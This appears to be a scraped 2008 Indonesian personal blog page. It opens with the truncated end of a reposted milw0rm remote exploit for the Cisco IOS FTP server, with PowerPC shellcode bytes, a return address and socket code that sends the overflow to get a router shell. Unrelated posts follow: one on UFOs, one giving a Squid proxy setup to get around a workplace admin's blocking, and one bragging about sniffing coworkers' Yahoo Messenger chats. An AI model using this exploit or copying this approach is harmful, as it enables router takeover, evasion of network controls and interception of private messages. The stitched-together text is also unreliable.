"\x7c\x89\x03\xa6" /* mtctr 4 */
"\x4e\x80\x04\x20" /* bctr */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */

"\x80\x06\x23\xB8" /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8 lwz 26, 20(26)
0x800623BC mtctr 26
0x800623C0 mr 3, 27
0x800623C4 bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

printf ("\nUsage: %s \n",argv[0]);
exit(-1);
}

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
{
printf("Error sending packet...quitting\n\n");
exit (1);
}
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

// milw0rm.com [2008-07-29]

Black Box : my Adrenalin was up its bad day ... when i got straight off again from u ... finally its over in few day and then will begun ... trust me ...

Tuesday, August 05, 2008

UFO Oh UFO ... Pengen Naik pesawat Kamu ...

Duh aku termasuk penggila ufo nih ... coret-coret aja ke blog ...
begini dari sma dulu aku sih penasaran sama ufo kenapa ... karena dulu waktu di tebet saya pernah melihat ufo dan masyarakat disana gempar , gimana gak gempar ada yang teriak2x ufo .... , setelah kejadian itu besoknya cari di internet ... seingaktku itu kelas 2 sma lho , iseng-iseng browsing cari artikel akhirnya aku mengakui keberadaannya ...

ufo = segitiga bermuda ( Lost World ) yap mungkin ... ahh pesawatnya yang aku butuhkan ..... supaya bisa dilihat ... pake BBM gak yaa...

ingin lihat videonya youtube.com aja deh ...

Monday, August 04, 2008

By Pass Pake Proxy

Wah neh artikel buat lagi deh soalnnya buat temen di medan namanya rani... , gipula dibuat supaya dia bisa browsing dan kebetulan seantero perusahaan ini pakai segmen 10.x.x.x berikut ujicoba proxy pakai squid ... lucu deh sampai sampai dia takut :D
ngapain takut la wong ini era kebebasan , kebebasan dalam berkarya , hacking its art ... emang kacrut deh tuh si admin masih suka aja ngeblok :D hihiihhiih

[root@devel1 ~]# cat /etc/squid/squid.conf

#The ports our Squid will listen on
http_port 8080
icp_port 3130

#cgi-bins will not be cached
acl QUERY urlpath_regex cgi-bin \?
no_cache deny QUERY

#Memory the Squid will use. Well, Squid will use far more than that.
cache_mem 128 MB

#250 means that Squid will use 250 megabytes of disk space
cache_dir ufs /cache 250 16 256
redirect_rewrites_host_header off
cache_replacement_policy GDSF
acl localnet src 192.168.1.0/255.255.255.0
acl localhost src 127.0.0.1/255.255.255.255
acl telkom src 10.0.0.0/255.0.0.0
acl Safe_ports port 80 443 210 119 70 20 21 1025-65535
acl CONNECT method CONNECT
acl all src 0.0.0.0/0.0.0.0
http_access allow localnet
http_access allow localhost
http_access allow telkom
http_access deny !Safe_ports
http_access deny CONNECT
http_access deny all
maximum_object_size 3000 KB
store_avg_object_size 50 KB

#all our LAN users will be seen by external servers
#as if they all use Mozilla on Linux Smile
#anonymize_headers deny User-Agent
#fake_user_agent Mozilla/5.0 (X11; U; Linux 2.4.4 i686)

#To make our connection even faster, we put a line similar
#to the one below. Don't forget to change the server to your closest!
#Measure pings, traceroutes and so on.
#Make sure that http and icp ports are correct
#cache_peer w3cache.icm.edu.pl parent 8080 3130 no-digest default

#This is useful when we want to use the Cache Manager
#copy cachemgr.cgi to cgi-bin of your www server
cache_mgr iqbal@sekuritionline.net
cachemgr_passwd secret_password all

#This is a name of a user our Squid will work as
cache_effective_user squid
cache_effective_group squid

log_icp_queries off

==================================================

[root@devel1 ~]# mkdir /cache/
[root@devel1 ~]# squid -z

[root@devel1 ~]# /etc/init.d/squid start

Running deh ...........

samakan config ini

[root@devel1 ~]# cat /etc/sysctl.conf
# Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.

# Controls IP packet forwarding
net.ipv4.ip_forward = 1

# Controls source route verification
net.ipv4.conf.default.rp_filter = 1

# Do not accept source routing
net.ipv4.conf.default.accept_source_route = 0

# Controls the System Request debugging functionality of the kernel
kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename.
# Useful for debugging multi-threaded applications.
kernel.core_uses_pid = 1

# Controls the use of TCP syncookies
net.ipv4.tcp_syncookies = 1

Sniffing Yahoo Messenger

Edan Pagi-pagi buta gw berangkat ke kantor wuzzzz 8 kurang 15 sampe kantor , tumben gw dateng secepat itu ahhh biasa deh kalau sudah awal bulan kejar tayang bikin laporan , malem minggu bukannya ngedate malah monitoring server :D maklum ada event chat bareng carrisa putri karena kalo nggak bisa gawat ... berkorban dikit lah ... back to work senin ini ada di benak kepala gw ahh iseng aja deh sniffing ym , dan its works ... mayan deh buat lihat keadaan sekitar , maaf pula buat yang kena sniffing , salah sendiri kenapa gak di secure ... ternyata dibalik gajah ada semutnya ... dan siapa itu gajah dan siapa itu semut ...

lihat disini : http://www.sekuritionline.net/soft/intipym.pdf


i'm inetholic now and then .... perhaps ... u know how the fell like me ... its terrible